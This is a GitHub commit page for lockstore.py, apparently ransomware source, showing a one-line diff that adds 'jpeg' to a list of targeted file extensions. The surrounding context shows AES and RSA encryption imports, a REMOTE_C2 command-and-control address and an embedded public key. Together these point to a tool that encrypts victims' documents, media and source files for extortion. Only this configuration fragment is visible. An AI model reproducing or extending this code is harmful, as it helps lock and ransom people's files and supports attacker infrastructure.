Skip to content

Commit

Permalink
Added jpeg file check
Browse files Browse the repository at this point in the history
  • Loading branch information
phoenixrising1800 authored Apr 19, 2022
1 parent 5099844 commit b0a4f5b
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion lockstore.py
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@
from Cryptodome.Cipher import AES, PKCS1_OAEP
from Cryptodome.Random import get_random_bytes

tgt_exts = ['txt', 'png', 'jpg', 'pdf', 'docx', 'mp3', 'mov', 'md', 'bat', 'py', 'mp4', 'doc', 'js', 'c', 'java', '7z', 'bz2', 'zip', 'gz', 'tar', 'gif', 'html', 'h', 'sln', 'vcproj']
tgt_exts = ['txt', 'png', 'jpg', 'jpeg', 'pdf', 'docx', 'mp3', 'mov', 'md', 'bat', 'py', 'mp4', 'doc', 'js', 'c', 'java', '7z', 'bz2', 'zip', 'gz', 'tar', 'gif', 'html', 'h', 'sln', 'vcproj']
REMOTE_C2='http://192.168.230.128:9000'
PUBLIC_KEY='''-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkhgXKdG6b2S3AjafAdmc
Expand Down

0 comments on commit b0a4f5b

Please sign in to comment.